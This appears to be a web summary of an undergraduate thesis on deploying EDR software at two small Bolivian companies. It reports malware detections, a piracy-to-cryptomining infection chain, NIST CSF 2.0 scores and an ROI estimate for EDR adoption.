Cyber Threat Analysis Using EDR Technology to Strengthen Information Security in Cochabamba SMEs
Paola C. Medrano Pizarrozo·Universidad Privada Domingo Savio·Network & Telecommunications Engineering·April – July 2024
Advisor: Lic. Vladimir Wilmar Rojas Condori
Original contribution
To my knowledge at time of writing, there was no published empirical study documenting a real EDR deployment in Bolivian SMEs, nor primary threat intelligence data from this specific LATAM context. This work contributes:
1
A documented real-world EDR deployment across two operational SMEs — not a lab simulation — yielding original threat telemetry from 16 endpoints over 2 months.
2
The first NIST CSF 2.0 evaluation (106 subcategories) applied to micro-SMEs in Bolivia, establishing a reproducible baseline measurement methodology for this context.
3
Empirical evidence of the piracy → malware infection chain in resource-constrained environments: illegal software activators (KMSpico-type) as the dominant threat vector, accounting for the majority of trojan and cryptomining detections.
4
A practical security improvement algorithm designed specifically for SMEs with no prior security posture — bridging the gap between international standards (ISO/IEC 27001, NIST CSF, GDPR) and organizations that have no baseline to start from.
Research questions
RQ1
What are the most prevalent cyber threats in Bolivian SMEs, and what are their primary entry vectors?
Finding: Trojans dominate (60.94%) in both companies; the primary vector is illegal software activators, not phishing or external exploitation as commonly assumed.
RQ2
Can an EDR solution be successfully integrated into resource-constrained SMEs with existing legacy infrastructure?
Finding: Yes — deployment succeeded on all 16 accessible endpoints (x64, Windows 7–11), with three deployment methods adapted to constraints (USB, offline installer, email link).
RQ3
What security posture gaps exist in these SMEs, and how can they be addressed using international frameworks?
Finding: Both companies scored 1.5/4 on NIST CSF 2.0. Critical gaps: identity management, awareness training, incident response planning, and governance oversight.
RQ4
Is EDR investment economically justified for SMEs with revenues under 1M Bs/year?
Finding: ROI of 173–801% — economically viable even for micro-enterprises when ransomware risk, cryptomining energy theft, and remediation costs are factored in.
Technical & research skills applied
🛡
EDR Deployment
Sangfor Endpoint Secure
🔍
Threat Analysis
Classification & triage
📡
Network Assessment
Port scanning, topology
📋
NIST CSF 2.0
106-subcategory eval.
🔐
ISO/IEC 27001
Controls & governance
💶
Security Economics
ROI & cost-benefit
🧩
MITRE ATT&CK
Threat classification
🔬
Field Research
Interviews, observation
Overview
This is a field case study conducted as my final undergraduate thesis. Bolivian SMEs represent 44% of national GDP yet lack the resources and awareness to defend against modern cyber threats. I deployed Sangfor Endpoint Secure EDR on two real companies in Cochabamba, monitored their endpoints for two months, and applied the NIST CSF 2.0 framework to evaluate their security posture. Within these two companies I detected 234 malware instances, 2 APT-level indicators, and 632 suspicious PowerShell alerts — with trojans representing 60.94% of detections, primarily introduced through illegal software activators. I proposed a practical security improvement algorithm and demonstrated a positive ROI of 173–801% for EDR adoption at this scale.
Scope & Limitations
Sample size: Two companies — findings describe these specific environments. Statistical generalization requires a larger sample across sectors and regions.
Monitoring period: Two months (May–July 2024). Seasonal threat patterns and long-term persistence of APT threats cannot be assessed from this window.
NIST CSF scoring: Derived from CEO/user interviews + EDR logs + direct observation. Scoring 106 subcategories via qualitative data introduces subjectivity.
EDR coverage: Company B: personal devices were excluded (permission denied), limiting completeness of the threat picture for that environment.
Bolivia's Cybersecurity Landscape
Bolivia ranks 140th out of 194 countries in the Global Cybersecurity Index — the worst performer in South America — yet SMEs drive 44% of GDP and 70% of private employment.
140°
Global Cybersecurity Index (194 countries)
60%+
of SMEs experienced a cyber incident in the past 2 years
84%
of attack victims received no guidance or support afterwards
43%
of 137B LATAM cyberattacks in 2023 targeted SMEs
Cyber risk exposure indicators in Bolivia (%)
SME Environment Profiles
Understanding the technical environment is key to interpreting the threat findings. Both companies operate in Cochabamba's Cercado province with minimal IT governance.
Company A — Geotechnical Engineering
12 endpoints
~10 years in operation. Provides soil studies, terrain stability analysis, foundation engineering, and geotechnical risk evaluation for national construction and infrastructure projects.
OS Windows 7 Ultimate / 10 Pro / 11 Home — most unpatched
⚠Received lawsuit from an international company for delivering services using pirated software (AutoCAD activators)
Company B — Telecommunications
4 endpoints
~5 years in operation. Designs, builds, and maintains telecom infrastructure: radio base stations, antenna installation, 5G SWAP upgrades, GPON fiber networks, and data centers. Expanding to Chile.
OS Windows 7 Ultimate / 10 Pro / 11 Pro — all unpatched
Apps Office suite only — Windows Security as sole protection
⚠Replaced server hardware believing it was physically broken — EDR later revealed it was silently running cryptomining malware
Flat network architecture — unrestricted lateral movement
Neither company implemented network segmentation. Every device sits on the same subnet with no VLAN, no firewall rules between workstations, and no VPN. A single compromised endpoint gives an attacker direct access to all devices on the network, including the file server.
Company APPPoE · Mikrotik · 192.168.0.0/24
Company BTIGO ISP · TP-Link · 192.168.1.0/24 (DHCP)
Multiple admin accounts had weak or no passwords. No MFA implemented. Most endpoints connected to the internet without VPN or network segmentation.
Threat Intelligence Findings
The EDR monitored both companies from May 1 – July 1, 2024 (Company A) and May 7 – July 1, 2024 (Company B), detecting 234 malware instances, 2 APT-level threats, and 632 PowerShell alerts.
234
malware detections
2
APT-level indicators (MITRE ATT&CK T1071, T1105)
632
PowerShell suspicious alerts
Malware type distribution — Companies A & B
Why trojans dominate (60.94%)
The primary vector is illegal software activators (e.g. KMSpico) used to activate unlicensed Windows and professional tools like AutoCAD. These activators bundle trojans that are indistinguishable from legitimate processes to traditional antivirus.
Most-affected endpoint: SERVER (admin permissions on all users)
Advanced Persistent Threat (APT) Indicators — Company A only
DESKTOP-3VHFVU9 — HIGH
MITRE ATT&CK T1071 (Application Layer Protocol): malicious traffic embedded inside chrome.exe, blending with normal web traffic to evade network detection.
Before this study, Company B noticed severe server performance degradation. With no security monitoring in place, the IT team concluded the hardware was physically failing and replaced the entire server. The real culprit — cryptomining malware running silently in the background — was never identified and migrated to the new hardware. The EDR deployment finally revealed the truth: the machine was actively mining cryptocurrency for an unknown attacker.
Energy consumption — calculated from the study
Extra power per infected endpoint
cryptomining GPU/CPU overhead
300 W
Daily operation
working hours
8 h/day
Annual operation
excluding holidays
350 days
Extra consumption per endpoint
300W × 8h × 350d ÷ 1000
840 kWh/yr
Bolivia electricity cost
national average
0.60 Bs/kWh
Endpoints affected (Company A)
confirmed by EDR logs
2 PCs
Annual electricity stolen1,008 Bs
840 kWh × 0.60 Bs × 2 endpoints — paid by the company, mined for the attacker
Performance impact on endpoints
→CPU/GPU maxed out: legitimate engineering software (AutoCAD, Civil 3D, ArcGIS) became unusable on affected workstations — users experienced constant freezing.
→Invisible to legacy AV: cryptomining processes disguise themselves as normal system activity — Windows Security and Panda did not trigger any alert.
→File corruption: Company A reported files being corrupted due to malicious activity. The origin was unknown until EDR behavioral analysis traced it.
The piracy → cryptomining infection chain
1.Download KMSpico / activator
→
2.Trojan bundled silently installs
→
3.Cryptominer runs in background
→
4.CPU/GPU consumed, system slows
→
5.IT replaces hardware (wrong diagnosis)
Both companies used software activators (KMSpico-type) to bypass licensing for Windows, AutoCAD, Civil 3D, and Office. These were the primary entry point for both trojans and cryptominers.
Incident frequency timeline (May – July 2024)
Peak in early June caused by software activator usage. Detections drop after EDR containment measures.
Detections by Sangfor EDR engine
Gene Analysis Engine caught the most threats. Multiple engines working in parallel detected malware missed by traditional AV.
Security Posture: NIST CSF 2.0
106 subcategories across 6 NIST functions were evaluated (0–4 scale). Both companies scored 1.5/4, indicating cybersecurity risk management is not yet integrated into organizational practices.
NIST CSF score: current vs. 12-month target
Critical gap areas identified
Identity Management & Access Control
Cybersecurity Awareness & Training
Continuous Security Monitoring
Incident Response Planning
Governance Oversight (GV.OV)
Identify Improvement processes (ID.IM)
The most critical insight: neither company has a security policy, incident response plan, or cybersecurity committee. Technology alone (EDR) is not sufficient — governance must improve in parallel.
A step-by-step security algorithm was proposed for SMEs that have no existing security strategy. Starting from the NIST CSF assessment, it guides organizations to reach a score of 4.0/4 within 12 months, aligned with ISO/IEC 27001 and GDPR.
START
Step 1
NIST CSF 2.0 Assessment
Evaluate 106 subcategories across Govern, Identify, Protect, Detect, Respond, Recover
This study raises several questions that I consider worth investigating further — particularly relevant for security research in emerging economies and resource-constrained environments.
Empirical security measurement
How representative is the piracy → malware vector in LATAM SMEs at scale?
A longitudinal study across multiple countries and sectors would determine whether the piracy chain is a regional pattern or specific to Bolivia's licensing enforcement context.
Usable security
What is the minimum viable EDR configuration for SMEs with no dedicated IT staff?
This study applied enterprise-grade EDR configuration. Future work could optimize detection coverage vs. operational complexity tradeoffs for zero-IT-staff environments.
Security automation
Can behavioral EDR data be used to automate NIST CSF scoring?
Manually evaluating 106 NIST subcategories requires significant effort. EDR telemetry partially overlaps with several DETECT and RESPOND categories — automated scoring could make continuous evaluation viable.
Threat intelligence
What is the actual dwell time of cryptominers in unmonitored SMEs?
Company B replaced hardware without diagnosing the root cause. This suggests cryptominers may persist undetected for months or years — the actual prevalence and dwell time in this population is unknown.
Key Conclusions
EDR successfully integrated into both SMEs, detecting threats like cryptomining that were completely invisible to legacy antivirus — including incidents that had gone undetected for months.
60.94% of threats were trojans. Root cause: illegal KMSpico-style activators used to bypass Windows and AutoCAD licensing. This is a structural, cultural issue in Bolivian SMEs.
2 APT-level indicators were found in Company A (MITRE T1071, T1105), signaling active early-stage exploitation attempts that would have gone unnoticed without EDR behavioral analytics.
Both companies scored 1.5/4 on NIST CSF, with critical gaps in identity management, governance, and incident response. Technology alone is insufficient — governance must improve in parallel.
ROI of 173.2%–801.6% demonstrates that EDR investment is economically justified even for micro-enterprises, especially given the potential cost of a ransomware attack (~16,000–18,000 Bs).